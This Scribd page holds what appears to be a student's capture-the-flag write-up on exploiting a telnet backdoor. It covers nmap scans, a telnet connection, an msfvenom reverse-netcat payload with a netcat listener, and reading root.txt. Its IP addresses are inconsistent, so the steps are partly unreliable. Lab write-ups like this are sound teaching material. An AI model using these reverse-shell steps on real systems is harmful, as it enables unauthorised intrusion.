Scribd
Upload
47 views

Part D ZW

Uploaded by

howiee0730
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
47 views

Part D ZW

Uploaded by

howiee0730
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

Part D: Exploiting Telnet

Step 1:
Narrow down the candidates for the server IP hosting the TELNET server by retrieving my
device IP address by using $ ifconfig.
Next, perform a nmap scan on the IP address of my device with $ nmap -sS 192.168.1.0/24
/24 is to restrict nmap to 24 bits and limit the scope of scanning between /0 to /255
Output below is the scan report from the command:

The IP address contains the most ports among all the IP address in the output, therefore it is safe
to assume that this IP hosts the TELNET server.
Attempting to probe this address, the command $ nmap -p- 192.168.0.192 is used to list every
port currently available in this IP address, including the hidden ports.

By comparing the current output with the first output, it becomes clear that the port with value of
8015 or greater are the hidden ports. Therefore, it is feasible that the TELNET server is among
one of the hidden ports.

Step 2
To test whether the above assumption is correct, the command $ telnet 192.168.1.164 8015 is
used as an attempt to telnet to the server

A message is shown upon connecting.


AVO’S BACKDOOR. Type .HELP to view commands
Step 3
Generate a reverse shell payload with msfvenom command
$ msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.164 lport=2233 R

Step 4
Start reverse shell via telnet session on server with code $.RUN [output from msfvenom]
At the same time, start at netcat listener as well, to listen on the server with the code $ nc -nvlp
2233
Connection to the Telnet server will be established once the reverse shell is activated.

Step 5
Extract the contents of the root.txt to receive the final flag with code $ cat root.txt
Output shown is the final flag value.

You might also like